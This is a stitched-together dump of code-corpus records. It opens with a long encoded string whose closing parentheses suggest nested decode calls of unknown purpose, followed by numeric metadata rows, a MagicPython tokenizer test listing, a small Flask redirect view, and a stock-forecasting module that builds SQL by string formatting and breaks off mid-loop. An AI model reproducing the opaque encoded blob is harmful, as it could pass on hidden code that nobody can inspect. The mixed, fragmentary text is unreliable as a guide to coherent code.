IFJIKIK43ISLNG73QUCYIHUWLWXBQIFQYSBKHQAG3IAVSTACWEN3FVCUPCCQAZEBKAFTJQCTAZVXGI6AUW5YRLVHVBAHAJIL2ODXUPSB43QSMU2FAGQVBMMTULZT6EZNDTIL4MCHXGGY3HW3B25RNRAWLUK52C3BIQP5P3WDEKWWKZNSZTJWY2QCKFVSB7RNAGN2LVIBS6JD2WPKKVS2YPJ5RMLR63HR4GR5KGPGH3YOBHZWIMGLVWBBP6YKCJ5KOI7PYGJFSIXJJMR42GRXYKAKBJKMEWM6L3VEO52HU6ZK7BOJUARKIVZ3ZC4AEVSZZLQJ37656472PBMUHRGGGN57DXPA747YDUI7EORB4Z3FDTHOI6O54DJZX3ILXHOMNY2A2EVTDKTW4LQY3YJS447DMZ6N22ELJZ7ZRXTWUPFT545563BHK7RXLHZNUI6O5YTC4LMJBLXSW4ADSKJTSP5XZ4D2GK7L4SF3DF5OTFYJGJR6BHC2KL265JHF6PZPVPJF27ZAFKEDXD7W6DGO7PMPKC3FT4T325FDSWCDDVAZHDT754QIRAK77L3KFF
RT3L2FXFV6TBPPHCOO6SVTOO272VS56M35KUWCVCUBPFWBXWLK3NU34GIOYI7P4ZRVRE32HCM357AZVQMWD56DFUGQJ66A6OPI2BFZ7PAZ7ASXBDRQGMCPVP4JGNIBK3SIX5AV5WWHSLL3PAF4WYHOEIUCXDEK6EXWVPSEQXOAJROFKEIX3RKOH744RM4LCV6CUYNROT4IGCPNEQ7YE3SH77QBSGFKPNN4L2P6GZGJ7264UZ43ZL4E36Q3C6ZBRWYPWP4OYSY4A2GGR7Q4HBH5XCXDNWHONVHDIKWE4LWV5J7G4XOI534HLE54K4H5EYH7LY2YR55KIG6VNDPCXUFXCSS7PCXNRG4N54KPWWRHMN622E6FVZ27S6QUEZ4HDMGCCQ4OETAVJYB667EEOKSKPEUXX6IHBJFHNMXPZLYROZMPEJBO4ATC4J4JRLWSW4P72CNLTIE2XFTECXHSV4J7OKM6SM4SCXOAGZQRNO3MMDW3FFLR43YH73TTZ3CS7W47A25PJ67R444LHUJTPOKIJNSXMGQ6TXVW7DUPDNXZ5DXFIYVGMCGNSE5CLSZ6JTKMHCG3IYTXLOFMDCZPTWIMB7WW5YYVTP7C3J2PMVZWGFTBXMW6ZNDPAVRXRK33ESN5SRQO7TQE3ZFCNLPBLLE54PH6F7RQVB3JH55SWEP55YID46MZX4LENI6LBZL3T54PFGZQZFFQRQTMO3KC2X4NRLYQS2LT3CALXGESXZ3GXJB5377AJRO5ATK4RIQ26ZKXRD523TUSXEDTO4FMQK45OXBE56254SE5SGE4BX5CWQJ3LMEVAA737ZJLIF5NQS6RWFNSXAOWE6Q55KQDO553LVJB7QX2YJDDMVTEXRHOK5NCNQK67QJ22EXOKVOCPHWZJNIWV3AQR6EXB3CYBTWPXW7AO74TKYHOOWE22I3B7KOG6EXPOSJXTJSD4KOI7OLVYVIJNLRYKZ5CCJ33U7FXLRIRN55D2ZUS5ZRTQIFWR6C2VMPLLQQ653SIT7CAJXOFSSZ6WXBB5Y5N7RIE3XCZJM7LLQQ64JT4T7CDLOMJNIJ4LNHNFNYCG7SO4MNN3RNUBLR5W5UVXA7XOEBGO4ZI4OY4RNOQMWXF3IQ4OFVYR6ZELL7SQJOOKMJNKRPPSCPWGVLX3YKL75FWX5KK5V67IY26YRJZ5CRBVV6D6AEL4DTKULMD54IH46YXBNR3O4TARUCD7UMF2FXDV7HDHXA6CJMS6KCJDYIJEHABFQ4CE5C7Q6DNYAJMHN2BCUZJVYU5AFPPMXXZ4GEPBBAYRGYD3Q5UERQ6KEDGEJ6ZVBJ54EHOSIYZFBQVQYFWJBD2XLKCXJBNZK7EJBO4ATK47A53IK6EGT5T3CALXOESWXUHO2C3QXXUE6X4ATK47A53IK6EJX4T3CDLOUJ5MIMI5PMFJY77QM3XATDO4M5QK4M4XJF53RQCJ3RMID7VKGLWGBHPMIVXQBWE7AF54WFXQN363NAVDTJUP2VKHOW3DXO3LPK5F7WKLPNUPXWCY73V6W7K7OUON6YOT5R74ENN5ZPKZN5653XQWX3LZQ7OKXPTP5RO7LHYP4CK5WJCZY4EXBNN73IGUVZJCHAFAYX4ORKOAKCN6ZDI6ESDC7APQCJSRJP3B2DHDWSZS7L5ZXYCZUKIIWOIT4CIGZZZK36T6Q7FVQXOENW7ZD2WLNRXNBNY7OJSO4IBG5Y6ISXMV4I5PYHSEQXOQJVPPWE5YFHCX7XE2XMCTK47EJLWK6EJX5T3CLLOQJVPPWE5YFHC77JJVOJHG5YFZAVZV5OCL3SJYCJLTEE2XFXECXHWV4JPMU6QJCOEADY66Q4YJEQ6E2OHIQ4NBMTVYZODJD3H4ECPGBWKYLVQQDIHC2AHAJF7VPVSUWL3B5ZIWWSP5QISLTDT2RAWOEQPG4ZS5W6H6US5OT42DBEWLLR42YFHHFZ3OYCPRIZFMPK4LG2SRN6URO57QUIN7BINLZSH5G3QL6
KQBLDYCHVUBJ74KHGKOFKBH5N7CBT2HREP74JRI3LDGVCJW47JMBLYR637ZCJLSQJN5FQFPCL3YHTEQXFQS323AK6E7W3TO4IMWWSYOXBB55W36J3RRS22LB24EHXG7PMINOVSIPHNBNYD4GXQESXELNPICHCPJ3JLOCE2CJ3RME3XBBYFOCDXNFNYH52RCZ6JLS6Q7ONK26JLW6XLOPLYDEF3B3XFJ32L73LJP4BU7Z7YJL7VG4WAQ3O4KMBQH334T4DAT3M2WQS3DPJHQLKJFSUPHKSLFB6HHUXZL6PYFAQCDBRRZ4KGIES2VWNOI4SMOAXDYYEAGIVOAXLMR2EZ3KYFLEI6MVWISV5OAXADY24VUAEZ5Z44SUDKWCWISOITFCBGHHPK72RBGW3TBFNI2MYIFVLEYCO2CTRT6JTZCILXCESWF4CO2C3RMZ6J7RIE3XCZKC2AXJB5YH3ZCLLOAJVOLQE5UFHDGW7SO4EMN3R4VBNBLQQ44FXQEWX4QTK4XAI3IK6E7WWTO4JBG5YOIQWQV4IPMW6QSK43BGVZLZAVZ3VPCP3WY3XCEJXOGDQK4MHO6K3R6YNJ3RIJOXQ2EIYP6DYQSEY6XIQ4PRGG54Z7DMLGX6FI4KPFEUJXJGASMW42H3SIU5GX5C7RR7KNIZPDPRFZP2L6ENFCVUWSXXSEU4IN7TLSAX76Q3N7FZD6SEYWVSM5ACT42OKTYJUPXVQVMIFJR2FJ7OGSXGQICD74BUDZAB6VPISX6WU3VPDZ24MOEOQTOIOYEJO6XJG6PZTSGLEK7TD3CI5S7K4BKUL3DJGYI44AJV6FNYYR6W3HLIYNXEMEJBKT5JLFQVEGQ4UEPUNZ22M2ZXBOWBJ3S6TAKZKTWJAXRHNBPFYIGDEHKK2LVLW3IXGK25WNSW3PBRJWI6RZIREI36L7O2NXIWR4G3KTDN7UPWF3YZPFHHGW5GGAM7EFZC432KJP4Q3HGKXSSL2UYTSHHJA5QKPV2SHEO64RH3SD6HIIZZDSWOY6BBNALDUQ4FAQVY2S2O344RXSHBVX7K6G5O2XTR2IFHLDBUTUYPIBSQUHPQ44C5ZPLLPGTBLD5DYBDTCUOXB45T3HYBHI25DQGRGYX6JLJ7IBSQMHF4C56SFX2CVFMWHCKJY464YHJCM3TT4BNCEH7QY6GJR6RU3UNVJHUSPLWH26SH3SBLH35K5G5KO5UC47X52D5HYGOKCJNXQJR3HFH2RR6AQUPM2IR3YRANTYHHDV3DORNFEEGODJ47XEXYB4BW3U4JQJHM3UPJXF5JEKFP6I5R7QBZOH2OU4IE7KJO3VSD42OMTNYLDV4NETFDHMK7XUUDPLZIKGX5HZ2RJR4NF6EJVWLB75PDLRRNDK5UV2Y4NYAHOMT5NQEPIPNUDAYR3DCGGG7XHMDCGUDSGVT5GBCBD2F5YGFIH4PX7THMDCGVTSGFR5KBSC2X4OIAANYZUHOCH2DYNI3ZQ4BXDVMA6OYBU24OIZZXKQMQQ4ZP7VS76EYA4BU5API5Z4ZQDIVY7BRI6GYJ7BTDBSOQYFV5WUMC2OYYBRIYNZ3AWRKJZDAW5KB4D5P7HHX4VFIHMMVY2TSB5CUTTGBNKUD4GVDYYOJAYRSZXIMC267KGBNHOMAYP4ZNDOMYFU2YOIZV7LQPABKAVZEKUDSGFJE3TGBNGWDSGNP24CEBVS2PYO5UORDZ5BUR7IUBR3BCVDXSA3YYYBWTZJ5P37JNDYOMQDJEMQ7OX6XOMNZTZ7HLHS6JCU4LPHORKB4HQYDYMT2LWPXQ2DGIS63XI5NVPZWUNTMRSHCOUNH445ZMLCMZ7DSYXQ4T45U6YTPYWJAUWIF7QMUYDVEYZU5HRZX4PBSDYMI4JSSWQVOU6T6GHKUWWP2HG22C2DAOEXED3U2VOLRECNRQS45LDIEEMFYSMOBYTR7UJHVZH4O5LS4HVE2G2MXKFJSTOHM3ZYPKKN44LKS5KGCOTS7RYVMLBIBO
VGIRWHMJ2POZ7PMV3RJUYJJHACAW6RRH4ZXM2LO4J2SEM2LF3SN7DEMBVB2UN3F4BECU7RBXY5JK6KWFFSTKZ2T567DZK47XRVMGLTHHL7I5PV4V7BNGVIGRHPEUJ6PZLILUP34CG7GV4P47HV3NDZGA6I6DCNSIOMSGQXZ5XB75UHRISRLDL6PNOENO5RSHQZDIOBSS6JPTLK5XE4XZ7E6X6W2427SDJMWOLT6LN6ZDHYXCYO2K5SMV4K7CWROHY3UJODUPBUHA6JCHCKZOWOS5PGXCSRK5CRCINYSS6SCO6PHVMFVJJGYSIGQ7DHASET6B7JYN7ITVNAYS47S3T2P65GQ4J2HFTHWZGTOJTUDXDH6OEVUJZGPRETKPRVX65BH5F3XE6PISXO7BLPRGZIXC5AM7O6PYS4ED67BXFNWPMK6LLKCYJHT6DLI3EK22P4TB6M4LPH27M5ROMAABWBLFUKROV7L2ZZILFG2FFU72RXO32CGNGMHAHMZWD2CFFARWOGRXMDJS33M2OGK3GO36ZYQX3ICTVWELI4ATKJHG5FRG43LU7X53SCMJQPZHM7UQS4IH3JRICR4VILXHSXEZ7CM3YP4WA3XVQSDCOK57UYI4VTVMW2YKVGQZMA2IJHAWZV7STE6MV5ZZXIFPYA4AADOFZ2HK75K2T452JLV5D4X5G7TNRGJURYI5DZZJNNFO46IDK3XYF3Z4PJIHROL27W4J4V5Y2BMCSMAYM52YQJRAHAEIC3CCKPJ6I7M5PSMD5ZGK376RBQ7UZ7BQ2YEHDX7IFQGGIZDVFTCQ3Q7PW4HHUC4AZQI3SYAAIRZ6GIRZVPYCAF5GTPLOUFBVGEGMIDYAGASZYJVBYEOITS5PVHIKPDZZNCJQR5MJTCIIUNATD6DJG6Q2Q5GQMJ5EXHUIB4OCC56ORNBYGCEHEV3EQ7RJA77INEDRAGP2RD4OJ4GEVNZFS3UQZ5GEOHGCDM46LYJ46HDSN7XTRRMMX5XDCIYOLOWBMHFXFDHFLZCQIN7E2IAN5Z2MZQJEIPLZ5HB4KQINAMHTOKRJFWMTKHOYCJ7P4AOAL4BSXIHFEVBAWB6YBD22SMVFFYMK5TULNQBN2DLRYXOKP4ZJRWSHNGEPNGEPSG6AQL3UVS3T6HTHPAKHNKU73VZ4N7CW2GBT5EGR4UUMDAI2YH56F7CQ4VKEZQWLL2S3MOXWLXEVNRZ65OZ5LMPP7KEZHZLLORDNSGVWQWZN3N6RWYII3MUFZPILMSHFCQW4UYFURYKJLJF7EFSATRE6PDEJHP2ZBJAF67WGALOVVKYBN3WQIAJUVIXAGZSWNG5OV4UC3U5L3QFXFMFWRYE6WLIA3JQ2CP2EG2M3XSV6OFFMU2PRLVP5LE3S22N5LAQX2KCC7JYPS6QHRVVB3JG3AD2WJYYF2IIVK46E6RYMJ452UJL4O5AQ2F54U2QI32PMD5A6ZL2UI32PED5E67LVIRXU6IH2J56XLRDPN4RHU7JEB3UNLEN5HKRFPR3UNKEN546DOQHJM5AHDBFXUV5APBKYQ7QNAIXZDMVYF4Z7L64SJYN6J4G6ESAPHUUV4A6PM5SYBW27SKWDDHNF32ITQXEHOI3ZVZJUAXOD6NJP7BABC6LFP2JGGBEYA5L4H6AO7XOGJGQA4ZXCX5KXDPSD2VYL4IH7IWOG7F7WRBZ33IQODRH7EYD4XYNV666XN77XM4LOYAC77MOPV6SBO7RH6FPTKDX4J6T7AP47CP7XXHEN77C6Y7BP3IDH7RNK4N76YMFGFILXGAZZK4ZBH733SIQEWQIQDS7YGKEQIAAG37GTSM4BKJ4FSAQACALWCBCH4KF43UE7RHXTVLDYXAR4MQCYCWSZIRPXPFWBQBAMVZWKB5F4YXQV46KUG6EQF6VE5U3BGK2KDDZU4GHTJEMPGSKLXTLAPTHGQ4CPDH563FYYARJCZYDQCOQSVQFAVHYVQT6FO6A35BU4LAFZALOXYNHQS732
5C2QAG5UXR2GYFLXNSYETQZMGASWF5VNIUTTZHKEVGYFNMFX5SVBUJ5HZTDKYKEJUYP4YOVWJGRU7UYZY2TQTWZE2GJMH7BTYT3CMGN4BO4ATY43WTB3I5FAZQRJJXJYYGLI3NTJJUYGXYYHFSYRG5R2O7RFXJSZRFXOM4GLOSOG5CAC7DJLJQY6R3XN3GFH5FYDLB6YW74IENSOZAGD2UOKW3GO2MDZQIW5GEDPTFPOQIT3XTXRV727EI53D4U234JDKIRL5KFLKBRNTK5UU234KXDJQCCIT2NIQSEOQZRFXPXHIDCGUDSEER5MB4DDTVZB635IHCIFO7GOQGENJHEIJD2QDEFVHZKPBFH5VQ3QPBVCHIBYDWEMHADSEWTTEARFLB4CPPKU6RMCSWDWEP4NXADSEWTTEARFLB6CKR4NHANH7C47KXU2BBMI5BTCP6FTUBZCKZZSAYSVA7BAATU763LZYCB3RXHADCGVTSEFR5IBSC2TM6477LIYP5U6TIEGNHMMARM6RHEIM2NIHUK47UQAIYD4TWUWFQH4J6G45APIVY4ZATKVQ7BFI6FO6S2IA7W2O5IMBNDM4CQH4NWJXGIC2NIHEIS7VQFULCEOVJIBZCDZZA6RKLZSAWRKB7CEWRKEOVS2EECVHKCFVB2Q5MIOUHKCFVB2QT4AYJCWO54IUE7OOYAU555ICJ3PRWXDKAJKFKUAMEPKRPNHAGINST6ZNYIWTYC7UAFRGCZYAWR6R2AGUH5B6YDAA2SOYDJX34WE6OBNLL2J26TWNHHG4AOFMHIF6TL36OCUOUMCMGGOAQCEZK2CFMK6NSX2B6W3TERCYGH4DHHZBDHBDNZ6LKNWGPLSFHXQYVPMUIS23LDECU6TOMGQ66I2WO4GIUNYOD5ICT5ZS6WWIM35DBEXWPFQOQ5PCRZXB3N4DUUQDQV6H5XLMFG7WDQSAF5VSNPAT7CY3VCKOARLIVGQC5QHV6BTDZNEOGQGAS7VCNQGM56WOXCZGYBOJIVLJVFQ6YWYTDYI2Y7CA3MCAMSFZWKIZNRHQ4HFVPJBMKEZSCLMHRQA4XS3FC6FTRJCYVBQ2V6INCOPV4WW7GBLNFPYEEV6ALATXEHAE7XEBEVQTCW7JU5YP2RHEM2YB5GZKBICIW4AHTJMTIFCYLXMJZ6CH4L42FNU6K5KBGOE7UGMXIKKQNAHQT5WPH2RP7KT322AC2IP33APWMR32ITGKJ5BHEEYCCKCCMBAHAD4CAICOGEFAAMADQQI6Z6V4MI3E6HUEGPGXBLH7KQHH37UEMEZ5HHQ6P5TITXFSM5CKRT44EAWYLDJESQKITE2S6PXQLI3K63VMNMPYEDRWP2IANP2EM5MKWPZGOVEO35BHFC27SG5EA3FBGHB7SSN3LUWZ3HLIMV7UXZE6OYBMYDXQMQ5PQZHIJLUFMZBE6QW7EUX5HX47UO736ST7P6M747RL6RT2DVWQW5BJB7TCQMX5IG32GHKB6SUFL2TTS3UFCZBHV2CB5DZ2DHYKPUSSV7P73LE6TYA="))))
| 7,404.25
| 29,546
| 0.999122
| 18
| 29,617
| 1,643.944444
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.188726
| 0.00027
| 29,617
| 4
| 29,546
| 7,404.25
| 0.810666
| 0.001351
| 0
| 0
| 0
| 0
| 0.997025
| 0.997025
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 10
|
99d3a670f5f3af8a43c3220be3e7c1e9c9ab66cd
| 1,645
|
py
|
Python
|
test/statements/from1.py
|
abjugard/MagicPython
|
2802ded681e0ab1a1057821c1da287147d639505
|
[
"MIT"
] | 1,482
|
2015-10-16T21:59:32.000Z
|
2022-03-30T11:44:40.000Z
|
test/statements/from1.py
|
abjugard/MagicPython
|
2802ded681e0ab1a1057821c1da287147d639505
|
[
"MIT"
] | 226
|
2015-10-15T15:53:44.000Z
|
2022-03-25T03:08:27.000Z
|
test/statements/from1.py
|
abjugard/MagicPython
|
2802ded681e0ab1a1057821c1da287147d639505
|
[
"MIT"
] | 129
|
2015-10-20T02:41:49.000Z
|
2022-03-22T01:44:36.000Z
|
from ... import foo as bar
raise Exception('done') from exc
yield from foo
from : keyword.control.import.python, source.python
: source.python
... : punctuation.separator.period.python, source.python
: source.python
import : keyword.control.import.python, source.python
: source.python
foo : source.python
: source.python
as : keyword.control.import.python, source.python
: source.python
bar : source.python
raise : keyword.control.flow.python, source.python
: source.python
Exception : meta.function-call.python, source.python, support.type.exception.python
( : meta.function-call.python, punctuation.definition.arguments.begin.python, source.python
' : meta.function-call.arguments.python, meta.function-call.python, punctuation.definition.string.begin.python, source.python, string.quoted.single.python
done : meta.function-call.arguments.python, meta.function-call.python, source.python, string.quoted.single.python
' : meta.function-call.arguments.python, meta.function-call.python, punctuation.definition.string.end.python, source.python, string.quoted.single.python
) : meta.function-call.python, punctuation.definition.arguments.end.python, source.python
: source.python
from : keyword.control.flow.python, source.python
: source.python
exc : source.python
yield from : keyword.control.flow.python, source.python
: source.python
foo : source.python
| 48.382353
| 166
| 0.657143
| 181
| 1,645
| 5.972376
| 0.165746
| 0.288622
| 0.366327
| 0.199815
| 0.809436
| 0.753932
| 0.722479
| 0.683626
| 0.385754
| 0.246068
| 0
| 0
| 0.240122
| 1,645
| 33
| 167
| 49.848485
| 0.8648
| 0
| 0
| 0.37931
| 0
| 0.068966
| 0.002432
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.137931
| null | null | 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
99de51345671a61d45c66707155aa674b4c389f7
| 154
|
py
|
Python
|
app/main/views.py
|
lbgutierrez/kimble
|
35a5eb9a6899bd5840dbf88060cadbb60c52f946
|
[
"Apache-2.0"
] | null | null | null |
app/main/views.py
|
lbgutierrez/kimble
|
35a5eb9a6899bd5840dbf88060cadbb60c52f946
|
[
"Apache-2.0"
] | null | null | null |
app/main/views.py
|
lbgutierrez/kimble
|
35a5eb9a6899bd5840dbf88060cadbb60c52f946
|
[
"Apache-2.0"
] | null | null | null |
from . import main
from flask import redirect, url_for
@main.route("/", methods=["GET"])
def index():
    """Send visitors of the site root straight to the auth login view."""
    return redirect(url_for("auth.auth_login"))
| 25.666667
| 51
| 0.688312
| 22
| 154
| 4.681818
| 0.681818
| 0.213592
| 0.271845
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.149351
| 154
| 6
| 51
| 25.666667
| 0.78626
| 0
| 0
| 0
| 0
| 0
| 0.122581
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| true
| 0
| 0.4
| 0.2
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
|
0
| 7
|
822126d2e95092e3b468e70baef8edee1af7624c
| 82,354
|
py
|
Python
|
FinsterTab/W2020/DataForecast.py
|
Nabeel-Asghar/GM-Senior-Project
|
b50f3cb6eb861fed3edf09168c0e43a317c7c965
|
[
"MIT"
] | 2
|
2020-02-01T23:41:58.000Z
|
2020-05-19T02:11:33.000Z
|
FinsterTab/W2020/DataForecast.py
|
mshields11/GM-Senior-Project
|
b50f3cb6eb861fed3edf09168c0e43a317c7c965
|
[
"MIT"
] | null | null | null |
FinsterTab/W2020/DataForecast.py
|
mshields11/GM-Senior-Project
|
b50f3cb6eb861fed3edf09168c0e43a317c7c965
|
[
"MIT"
] | null | null | null |
# import libraries to be used in this code module
import pandas as pd
from statsmodels.tsa.arima_model import ARIMA
from sklearn.ensemble import RandomForestRegressor
from sklearn.svm import SVR
from math import sqrt
from statistics import stdev
import numpy as np
import xgboost as xgb
import calendar
import datetime as dt
from datetime import timedelta, datetime
import FinsterTab.W2020.AccuracyTest
import sqlalchemy as sal
from sklearn.model_selection import train_test_split # not used at this time
from sklearn.linear_model import LinearRegression
from sklearn.preprocessing import PolynomialFeatures
import matplotlib.pyplot as plt
# class declaration and definition
class DataForecast:
def __init__(self, engine, table_name):
"""
Calculate historic one day returns and 10 days of future price forecast
based on various methods
Store results in dbo_AlgorithmForecast table
:param engine: provides connection to MySQL Server
:param table_name: table name where ticker symbols are stored
"""
self.engine = engine
self.table_name = table_name
def calculate_forecast(self):
    """
    Calculate historic one day returns based on the traditional
    momentum/moving-average forecast model, plus 10 days of future price
    forecast, and store the results in dbo_AlgorithmForecast.

    Improved forecast: today's close price is excluded when predicting
    today's price; the prior business days' close prices are the inputs
    used to predict the next day's price.

    NOTE(review): SQL statements are built by string formatting. Inputs
    come from our own database tables, but parameterized queries would be
    safer if that ever changes.
    """
    # retrieve InstrumentMaster table from the database
    query = 'SELECT * FROM {}'.format(self.table_name)
    df = pd.read_sql_query(query, self.engine)
    algoCode = "'PricePred'"  # Master `algocode` for improved prediction from previous group, user created codes

    # add code to database if it doesn't exist
    code_query = 'SELECT COUNT(*) FROM dbo_algorithmmaster WHERE algorithmcode=%s' % algoCode
    count = pd.read_sql_query(code_query, self.engine)
    if count.iat[0, 0] == 0:
        algoName = "'PricePrediction'"
        insert_code_query = 'INSERT INTO dbo_algorithmmaster VALUES({},{})'.format(algoCode, algoName)
        self.engine.execute(insert_code_query)

    # loop through each ticker symbol
    for ID in df['instrumentid']:
        # remove all future prediction dates (rows with prederror=0)
        remove_future_query = 'DELETE FROM dbo_algorithmforecast WHERE algorithmcode={} AND prederror=0 AND ' \
                              'instrumentid={}'.format(algoCode, ID)
        self.engine.execute(remove_future_query)

        # find the latest forecast date
        date_query = 'SELECT forecastdate FROM dbo_algorithmforecast WHERE algorithmcode={} AND instrumentid={} ' \
                     'ORDER BY forecastdate DESC LIMIT 1'.format(algoCode, ID)
        latest_date = pd.read_sql_query(date_query, self.engine)  # most recent forecast date calculation

        # if the table already has forecast prices, delete the latest one:
        # it must be recomputed when run before market close at 4pm
        if not latest_date.empty:
            latest_date_str = "'" + str(latest_date['forecastdate'][0]) + "'"
            delete_query = 'DELETE FROM dbo_algorithmforecast WHERE algorithmcode={} AND instrumentid={} AND ' \
                           'forecastdate={}'.format(algoCode, ID, latest_date_str)
            self.engine.execute(delete_query)

        # get raw price data (joined with engineered features) from database
        data_query = 'SELECT A.date, A.close, B.ltrough, B.lpeak, B.lema, B.lcma, B.highfrllinelong, ' \
                     'B. medfrllinelong, B.lowfrllinelong FROM dbo_instrumentstatistics AS A, '\
                     'dbo_engineeredfeatures AS B WHERE A.instrumentid=B.instrumentid AND A.date=B.date ' \
                     'AND A.instrumentid=%s ORDER BY Date ASC' % ID
        data = pd.read_sql_query(data_query, self.engine)

        # prediction formula inputs
        # IF THESE VALUES ARE CHANGED, ALL RELATED PREDICTIONS STORED IN THE DATABASE BECOME INVALID!
        sMomentum = 2
        lMomentum = 5
        sDev = 10
        ma = 10
        start = max(sMomentum, lMomentum, sDev, ma)

        # calculate prediction inputs
        data['sMomentum'] = data['close'].diff(sMomentum)
        data['lMomentum'] = data['close'].diff(lMomentum)
        data['stDev'] = data['close'].rolling(sDev).std()
        data['movAvg'] = data['close'].rolling(ma).mean()

        # first predictions can be made after 'start' number of days
        for n in range(start, len(data)):
            insert_query = 'INSERT INTO dbo_algorithmforecast VALUES ({}, {}, {}, {}, {})'
            # populate entire table if empty
            # or add new dates based on information in Statistics table
            # TODO: look into this to add SMA
            if latest_date.empty or latest_date['forecastdate'][0] <= data['date'][n]:
                # When short- and long-term momentum agree in sign, project the
                # previous close plus a 99% band (2.576 standard errors);
                # otherwise fall back to the moving average.
                # NOTE(review): the original code had two branches (>=0/>=0 and
                # <=0/<=0) computing the identical value; merged here.
                if (data['sMomentum'][n-1] >= 0 and data['lMomentum'][n-1] >= 0) or \
                        (data['sMomentum'][n-1] <= 0 and data['lMomentum'][n-1] <= 0):
                    forecastClose = data['close'][n-1] + (2.576 * data['stDev'][n-1] / sqrt(sDev))
                else:
                    forecastClose = data['movAvg'][n-1]
                # percent error of the prediction against the actual close
                predError = 100 * abs(forecastClose - data['close'][n])/data['close'][n]
                forecastDate = "'" + str(data['date'][n]) + "'"
                # insert new prediction into table
                insert_query = insert_query.format(forecastDate, ID, forecastClose, algoCode, predError)
                self.engine.execute(insert_query)

        # model for future price movements
        data['momentumA'] = data['close'].diff(10)
        data['lagMomentum'] = data['momentumA'].shift(5)  # NOTE(review): computed but not read below

        # 'n' here is the last index from the historical loop above
        fdate = "'" + str(data['date'][n]) + "'"

        # number of weekdays to forecast
        weekdays = 10
        # 3 weeks of weekdays
        days = 15
        forecast = []

        forecast_dates_query = 'SELECT date from dbo_datedim WHERE date > {} AND weekend=0 AND isholiday=0 ' \
                               'ORDER BY date ASC LIMIT {}'.format(fdate, weekdays)
        future_dates = pd.read_sql_query(forecast_dates_query, self.engine)

        insert_query = 'INSERT INTO dbo_algorithmforecast VALUES ({}, {}, {}, {}, {})'
        # Forecast close price tomorrow (same merged-branch rule as above)
        if (data['sMomentum'][n] >= 0 and data['lMomentum'][n] >= 0) or \
                (data['sMomentum'][n] <= 0 and data['lMomentum'][n] <= 0):
            forecastClose = data['close'][n] + (2.576 * data['stDev'][n] / sqrt(sDev))
        else:
            forecastClose = data['movAvg'][n]
        # future dates have no actual close price, so the prediction error is 0
        predError = 0
        forecastDate = "'" + str(future_dates['date'][0]) + "'"
        insert_query = insert_query.format(forecastDate, ID, forecastClose, algoCode, predError)
        self.engine.execute(insert_query)

        # forecast the next 9 days
        for i in range(1, len(future_dates)):
            insert_query = 'INSERT INTO dbo_algorithmforecast VALUES ({}, {}, {}, {}, {})'
            # if the momentum is negative
            if data['momentumA'].tail(1).iloc[0] < 0.00:
                # Set Fibonacci extensions accordingly
                data['fibExtHighNeg'] = data['lpeak'] - (
                        (data['lpeak'] - data['ltrough']) * 1.236)
                data['fibExtLowNeg'] = data['lpeak'] - (
                        (data['lpeak'] - data['ltrough']) * 1.382)
                highfrllinelong = data['highfrllinelong'].tail(1).iloc[0]
                # Compute average over the last 3 weeks of weekdays
                avg_days = np.average(data['close'].tail(days))
                # Compute standard deviation over the last 3 weeks around that average
                std_days = stdev(data['close'].tail(days), avg_days)
                # Compute standard error and apply it to the running `decrease` value
                decrease = avg_days - (1.960 * std_days) / (sqrt(days))
                data['fibExtHighPos'] = 0
                data['fibExtLowPos'] = 0
                # assign CMA and EMA values
                l_cma = data['lcma'].tail(1)
                l_cma = l_cma.values[0]
                l_ema = data['lema'].tail(1)
                l_ema = l_ema.values[0]
                # Loop through each upcoming day in the week
                for x in range(weekdays-1):
                    # Compare to current location of cma and frl values:
                    # if CMA and FRL are lower than the forecast,
                    # forecast lower with a medium magnitude
                    if decrease > l_cma or decrease >= (highfrllinelong + (highfrllinelong * 0.01)) \
                            or decrease > l_ema:
                        decrease -= .5 * std_days
                        forecast.append(decrease)
                    # If CMA and FRL are higher than the forecast,
                    # forecast a rise with an aggressive magnitude
                    elif decrease <= l_cma and decrease <= (
                            highfrllinelong - (highfrllinelong * 0.01)) and decrease <= l_ema:
                        decrease += 1.5 * std_days
                        forecast.append(decrease)
                    # NOTE(review): the original also did `x = x + 1` here - a
                    # no-op inside a for-loop, removed. Also note: when neither
                    # branch matches, nothing is appended, so forecast[i] below
                    # can raise IndexError (behavior preserved as-is).
            # if the momentum is positive
            elif data['momentumA'].tail(1).iloc[0] > 0.00:
                # ...Set fibonacci extensions accordingly
                data['fibExtHighPos'] = data['lpeak'] + (
                        (data['lpeak'] - data['ltrough']) * 1.236)
                data['fibExtLowPos'] = data['lpeak'] + (
                        (data['lpeak'] - data['ltrough']) * 1.382)
                highfrllinelong = data['highfrllinelong'].tail(1).iloc[0]
                # Compute average over the last 3 weeks of weekdays
                avg_days = np.average(data['close'].tail(days))
                # Compute standard deviation over the last 3 weeks around that average
                std_days = stdev(data['close'].tail(days), avg_days)
                # Compute standard error and apply it to the running `increase` value
                increase = avg_days + (1.960 * std_days) / (sqrt(days))
                data['fibExtHighNeg'] = 0
                data['fibExtLowNeg'] = 0
                l_cma = data['lcma'].tail(1)
                l_cma = l_cma.values[0]
                l_ema = data['lema'].tail(1)
                l_ema = l_ema.values[0]
                for x in range(weekdays-1):
                    # Compare to current location of cma and frl values:
                    # if CMA and FRL are higher than the forecast,
                    # forecast lower with a normal magnitude
